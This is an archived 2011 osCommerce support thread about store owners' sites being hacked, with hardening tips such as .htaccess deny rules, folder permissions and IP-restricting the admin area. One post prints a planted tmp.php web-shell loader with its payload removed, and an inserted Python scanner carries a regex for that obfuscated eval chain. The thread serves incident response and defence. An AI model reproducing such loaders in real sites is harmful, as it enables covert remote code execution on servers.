dsone Posted January 27, 2011

I think the hacker came through the /admin/login.php exploit. I had OsCommerce 2.2 RC2 installed when this happened. I have now updated to 2.3.1 and changed the admin and DB passwords, and now it looks good. I will let you know if the hacker comes again ;)

Xpajun Posted January 27, 2011

> Hi everybody, This is indeed caused by OsCommerce.

NO... it is not caused by osCommerce, it is caused because you have (or had) a lack of security on your version of osCommerce - and that applies to everyone that comes on to this forum crying that their store has been hacked.

That statement may sound harsh but it is true. How many of you had back-ups of your store to put into place for if your store got hacked or your host dies? For those that have upgraded to 2.3.1, how many have put in extra security and have a full clean back-up?

Think about it... you have a store - it could be a plaything - it could be bringing in your lifestyle - it deserves to be protected the best you can do it... wouldn't you say?

burt Posted January 27, 2011

> NO... it is not caused by osCommerce, it is caused because you have (or had) a lack of security on your version of osCommerce - and that applies to everyone that comes on to this forum crying that their store has been hacked.
>
> That statement may sound harsh but it is true. How many of you had back-ups of your store to put into place for if your store got hacked or your host dies? For those that have upgraded to 2.3.1, how many have put in extra security and have a full clean back-up?
>
> Think about it... you have a store - it could be a plaything - it could be bringing in your lifestyle - it deserves to be protected the best you can do it... wouldn't you say?

+1

You put it so much more eloquently than I could have.

zododo Posted January 29, 2011

osCommerce is vulnerable. I have had a couple of osCommerce sites hacked recently. The latest one put .htaccess files into almost all folders, and it took me a lot of time to clear. Could anybody give hints on where and how they break into the server?

Guest Posted January 29, 2011

CJ,

Read the security forums.

Chris

Guest Posted February 2, 2011

Hey guys,

SAME THING TO ME. I have two stores (one with 2.3.1 and another with 2.2 RC2a) and on 25-01 at 1.25.00 AM several .htaccess files appeared...

One of my stores got hacked, I cleaned it up completely, deleted .php files and everything... took me two full days to do it...

Now, I have a problem trying to create an XML Sitemap... does anyone have the same issue?? I get a 500 Internal Server Error with the XML bot.

Thanks for your help!

scoy Posted February 7, 2011

Your .htaccess in your images folder should contain the following:

    # $Id$
    #
    # This is used to restrict access to this folder to anything other
    # than images

    # Prevents any script files from being accessed from the images folder
    <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
    Order Deny,Allow
    Deny from all
    </FilesMatch>

And nothing else, so if yours contains anything other than the above code delete it and replace it with the above

scoy Posted February 7, 2011

I have uploaded this script to my .htaccess file in my images directory, but I still have a hacker posting to my images directory. I remove the files almost daily. They are tmp.php, mail.php, read.php, news.php, class.php and other files.

I have removed all admins and renamed admin. I have checked all other directories; no other *.php files.

I am at a loss as to how they are posting to the images directory when I have the script posted in my .htaccess file.

Is there anything else I can do?

germ Posted February 7, 2011

You could put this .htaccess file in the images folder. It doesn't stop them from uploading crap, but the scripts won't run after they're uploaded so it doesn't matter a whole lot.

Check the permissions on the images folder. They should NOT be higher than 755.

You can find other tips at the link below:

How to Secure Your Site

atelierbeads Posted February 7, 2011

Well, I'm sure we'll all be delighted to learn that they're still out there. This happened to me on a BRAND NEW 2.2 installation--that is, WHILE I WAS SITTING HERE INSTALLING IT. Details I can provide are:

1) It happened sometime around noon, Eastern time today.
2) The tip-off was a "tmp.php" file in the main images directory, which was flagged 755. I will paste in the contents of that file.
3) It happened AFTER I did the basic OSC install but JUST BEFORE the .htaccess/.htpasswd files were uploaded.
4) I found an extra admin user. I found .htaccess files scattered around in several unexpected places.
5) A copy of my configure.php file was re-located from includes to the web root. I had already reset the permissions on this file.

NONE of my existing osCommerce installs were impacted. All have had the various 2.2 security recommendations implemented. I can only conclude that they got this one because it was in progress.

I have noted NO ISSUES with WordPress over the past two weeks, if anybody happens to have it. Will be checking more closely shortly.

Hosting is through Rackspace Cloud, and they were unaware of any problems. I fixed that for them--they are now. :-)

I think that's about it. Since this was a fresh install, and since I have all the files locally, it gave me the greatest pleasure just to blow the whole d#mned thing away.

Lessons Learned:

(1) Create the .htaccess and .htpasswd files BEFORE doing the install and upload them immediately thereafter when the install directory is deleted.
(2) Continue to follow, rigorously, the security advice pinned to this forum.
(3) When doing a new install, don't even get up to "p" until the site is locked down.

I'm not going to talk about how much I want to kill this person. In six years, I've only had one other infiltration, and that was an XSS problem several years ago.

Regards,
Anne

TEXT OF THE TMP.PHP FILE, FOUND IN THE IMAGES DIRECTORY

    <?php
    set_time_limit(0);
    error_reporting(0);
    $rhs="[encoded payload removed]";
    eval(gzinflate(str_rot13(base64_decode($rhs))));
    ?>

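A sweep for the symptoms reported in this thread (script files in the images folder, .htaccess files in unexpected places, the eval/gzinflate/str_rot13/base64_decode wrapper, an images folder looser than 755), added here as an example; it is not code from any poster or from osCommerce. The function names, the EXPECTED_HTACCESS set and the sample tree are assumptions constructed for illustration.

```python
import os, pathlib, re, stat, tempfile

# Same extensions the images/.htaccess FilesMatch rule in this thread blocks.
SCRIPT_EXT = re.compile(r"\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$", re.I)
# Decode-and-eval wrapper seen in the posted tmp.php (whitespace tolerant).
EVAL_CHAIN = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode", re.I)
# Assumption: the only places this store is expected to carry an .htaccess.
EXPECTED_HTACCESS = {".htaccess", "admin/.htaccess", "images/.htaccess"}

def scan(root, images_dir="images"):
    """Return sorted (relative_path, reason) findings for a store web root."""
    findings = []
    img_mode = stat.S_IMODE(os.stat(os.path.join(root, images_dir)).st_mode)
    if img_mode & 0o022:  # group- or world-writable, i.e. looser than 755
        findings.append((images_dir, "mode %o is looser than 755" % img_mode))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name == ".htaccess" and rel not in EXPECTED_HTACCESS:
                findings.append((rel, "unexpected .htaccess"))
            if rel.startswith(images_dir + "/") and SCRIPT_EXT.search(name):
                findings.append((rel, "script file in images folder"))
            if EVAL_CHAIN.search(pathlib.Path(full).read_bytes()):
                findings.append((rel, "obfuscated eval chain"))
    return sorted(findings)

def build_constructed_tree(root):
    """Constructed sample store showing the symptoms described in the thread."""
    files = {
        "index.php": b"<?php echo 'store'; ?>",
        "images/logo.gif": b"GIF89a",
        "images/.htaccess": b"Deny from all\n",
        "images/tmp.php": b"<?php eval(gzinflate(str_rot13(base64_decode($rhs)))); ?>",
        "includes/languages/.htaccess": b"# planted\n",
    }
    for rel, data in files.items():
        path = pathlib.Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(data)
    os.chmod(os.path.join(root, "images"), 0o777)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:  # demo on the constructed tree
        build_constructed_tree(tmp)
        for rel, reason in scan(tmp):
            print(rel, "-", reason)
```

Point scan() at a copy or read-only mount of the web root, and adjust EXPECTED_HTACCESS to the store's real layout before trusting the "unexpected .htaccess" findings.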
Guest Posted September 17, 2011

Hi Guys,

Interesting thread - whilst I'm not specifically an expert with os commerce, I am an expert in web application pentests.

One recurring theme that can be seen throughout OSCommerce-related security posts and topics is that the majority of attacks stem from the admin folder being publicly accessible. I'd suggest that, for those users with a static IP, you restrict access to the admin directory to only known administrative IPs - rather than rely on basic auth which is fundamentally flawed.

You should be able to place the following code in a .htaccess file and upload to your admin folder to achieve this:

    # Deny,Allow: every address is denied first, then the Allow line lets the admin IP back in.
    # Not wrapped in <Limit GET>, so the rule applies to every HTTP method, POST included.
    Order Deny,Allow
    Deny from all
    Allow from xx.xx.xx.xx

Also, consider having regular security tests - even if it's not by ourselves. They're about as cheap as a night out and can save you from the chaos of being hacked.

Guest Posted September 17, 2011

>     Order Deny,Allow
>     Deny from all
>     Allow from xx.xx.xx.xx

This would limit store owners to accessing their sites from limited locations, and those who use mobile devices that receive an IP on demand would not be able to access their site at all.

Chris

This topic is now archived and is closed to further replies.